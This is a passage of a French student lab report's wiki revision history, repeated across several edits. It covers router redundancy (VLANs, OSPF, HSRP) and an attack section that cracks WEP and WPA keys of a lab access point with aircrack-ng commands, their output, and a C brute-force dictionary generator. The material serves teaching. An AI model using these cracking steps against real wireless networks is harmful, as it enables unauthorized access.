Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Attaque=&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
On peut voir que le reseau a été renomé:&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon&lt;br /&gt;
&lt;br /&gt;
Avec la commande aircrack on decode la clef wep&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
                 [00:00:00] Tested 665 keys (got 99549 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 50   F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) &lt;br /&gt;
    1    6/  1   32(110848) 28(109568) B5(109568) 11(109312) 52(109056) &lt;br /&gt;
    2    0/  2   A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) &lt;br /&gt;
    3    0/  1   A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) &lt;br /&gt;
    4    0/  1   A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) &lt;br /&gt;
             KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] &lt;br /&gt;
 	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==crackage Wpa==&lt;br /&gt;
&lt;br /&gt;
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;quot;stdio.h&amp;quot;&lt;br /&gt;
 #include &amp;quot;stdlib.h&amp;quot;&lt;br /&gt;
 int main(){&lt;br /&gt;
 	int i=0;&lt;br /&gt;
 	FILE* fichier=fopen(&amp;quot;mdp&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
 	for(i;i&amp;lt;=99999999;i++)&lt;br /&gt;
    {&lt;br /&gt;
        fprintf(fichier,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
    }&lt;br /&gt;
    fclose(fichier);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:&lt;br /&gt;
 split -b 200000000 mdp&lt;br /&gt;
&lt;br /&gt;
Pour transferer les fichier, on utilise la commande :&lt;br /&gt;
 scp mdp zabethXX:mdp&lt;br /&gt;
&lt;br /&gt;
on effectue la commande :&lt;br /&gt;
 aircrack-ng logWpa-02.cap -w mdp&lt;br /&gt;
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
      [01:03:39] 20208040/102795810 keys tested (4001.16 k/s) &lt;br /&gt;
      Time left: 5 hours, 44 minutes, 1 second                  19.66%&lt;br /&gt;
                           KEY FOUND! [ 20133333 ]&lt;br /&gt;
      Master Key     : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 &lt;br /&gt;
                       A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 &lt;br /&gt;
      Transient Key  : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B &lt;br /&gt;
                       B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 &lt;br /&gt;
                       7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 &lt;br /&gt;
                       E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E &lt;br /&gt;
      EAPOL HMAC     : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53207</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53207"/>
				<updated>2020-11-04T17:00:29Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : /* crackage Wpa */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
=test=&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Attaque=&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
On peut voir que le reseau a été renomé:&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon&lt;br /&gt;
&lt;br /&gt;
Avec la commande aircrack on decode la clef wep&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
                 [00:00:00] Tested 665 keys (got 99549 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 50   F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) &lt;br /&gt;
    1    6/  1   32(110848) 28(109568) B5(109568) 11(109312) 52(109056) &lt;br /&gt;
    2    0/  2   A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) &lt;br /&gt;
    3    0/  1   A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) &lt;br /&gt;
    4    0/  1   A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) &lt;br /&gt;
             KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] &lt;br /&gt;
 	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==crackage Wpa==&lt;br /&gt;
&lt;br /&gt;
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;quot;stdio.h&amp;quot;&lt;br /&gt;
 #include &amp;quot;stdlib.h&amp;quot;&lt;br /&gt;
 int main(){&lt;br /&gt;
 	int i=0;&lt;br /&gt;
 	FILE* fichier=fopen(&amp;quot;mdp&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
 	for(i;i&amp;lt;=99999999;i++)&lt;br /&gt;
    {&lt;br /&gt;
        fprintf(fichier,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
    }&lt;br /&gt;
    fclose(fichier);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
si besoin, pour accelerer le traitement, on peut partager la charge de travail sur plusieurs pc. pour ce faire, on utilise la commande split pour separer le fichier:&lt;br /&gt;
 split -b 200000000 mdp&lt;br /&gt;
&lt;br /&gt;
Pour transferer les fichier, on utilise la commande :&lt;br /&gt;
 scp mdp zabethXX:mdp&lt;br /&gt;
&lt;br /&gt;
on effectue la commande :&lt;br /&gt;
 aircrack-ng logWpa-02.cap -w mdp&lt;br /&gt;
Cette commande va tester tous les mot de passes presents dans le fichier de mot de passe&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
&lt;br /&gt;
      [01:03:39] 20208040/102795810 keys tested (4001.16 k/s) &lt;br /&gt;
&lt;br /&gt;
      Time left: 5 hours, 44 minutes, 1 second                  19.66%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 20133333 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F4 DD 26 3A CD 9D 73 68 4F C5 6E DC DF AD FF 63 &lt;br /&gt;
                       A5 12 FB F0 66 F3 45 B0 30 44 24 53 CB 49 32 99 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 69 E3 37 64 12 48 43 2A BA D3 DF 47 FE 11 1A 6B &lt;br /&gt;
                       B0 4E 44 C4 72 8F EB B3 3F 9C 76 37 9F 34 89 C6 &lt;br /&gt;
                       7D 9B 34 68 22 AE 38 91 51 55 6B 5D 2F 31 E9 69 &lt;br /&gt;
                       E4 A5 9E CF 8B E7 EB 02 C7 44 4B AE 2A B4 7F 8E &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 89 DE EA B7 55 FF 34 D4 8A D5 C6 E1 E2 2F 80 93&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53191</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53191"/>
				<updated>2020-11-04T16:35:39Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : /* crackage Wpa */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
=test=&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Attaque=&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
On peut voir que le reseau a été renomé:&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon&lt;br /&gt;
&lt;br /&gt;
Avec la commande aircrack on decode la clef wep&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
                 [00:00:00] Tested 665 keys (got 99549 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 50   F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) &lt;br /&gt;
    1    6/  1   32(110848) 28(109568) B5(109568) 11(109312) 52(109056) &lt;br /&gt;
    2    0/  2   A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) &lt;br /&gt;
    3    0/  1   A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) &lt;br /&gt;
    4    0/  1   A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) &lt;br /&gt;
             KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] &lt;br /&gt;
 	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==crackage Wpa==&lt;br /&gt;
&lt;br /&gt;
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;quot;stdio.h&amp;quot;&lt;br /&gt;
 #include &amp;quot;stdlib.h&amp;quot;&lt;br /&gt;
 int main(){&lt;br /&gt;
 	int i=0;&lt;br /&gt;
 	FILE* fichier=fopen(&amp;quot;mdp&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
 	for(i;i&amp;lt;=99999999;i++)&lt;br /&gt;
    {&lt;br /&gt;
        fprintf(fichier,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
    }&lt;br /&gt;
    fclose(fichier);&lt;br /&gt;
 }&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53190</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53190"/>
				<updated>2020-11-04T16:35:06Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
=test=&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Attaque=&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
On peut voir que le reseau a été renomé:&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon&lt;br /&gt;
&lt;br /&gt;
Avec la commande aircrack on decode la clef wep&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
                 [00:00:00] Tested 665 keys (got 99549 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 50   F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) &lt;br /&gt;
    1    6/  1   32(110848) 28(109568) B5(109568) 11(109312) 52(109056) &lt;br /&gt;
    2    0/  2   A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) &lt;br /&gt;
    3    0/  1   A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) &lt;br /&gt;
    4    0/  1   A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) &lt;br /&gt;
             KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] &lt;br /&gt;
 	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==crackage Wpa==&lt;br /&gt;
&lt;br /&gt;
on effectue la meme procedure que pour la cle wep. Pour le decodage, on doit utiliser un dictionnaire de mots. Pour ce faire, on crée un petit programme en C qui va generer tous les mots de passes possibles qui sont sous la forme de 8 chifres :&lt;br /&gt;
&lt;br /&gt;
#include &amp;quot;stdio.h&amp;quot;&lt;br /&gt;
#include &amp;quot;stdlib.h&amp;quot;&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	int i=0;&lt;br /&gt;
	FILE* fichier=fopen(&amp;quot;mdp&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	for(i;i&amp;lt;=99999999;i++)&lt;br /&gt;
    {&lt;br /&gt;
        fprintf(fichier,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
    }&lt;br /&gt;
    fclose(fichier);&lt;br /&gt;
}&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53172</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53172"/>
				<updated>2020-11-04T14:42:23Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : /* crackage WEP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
=test=&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
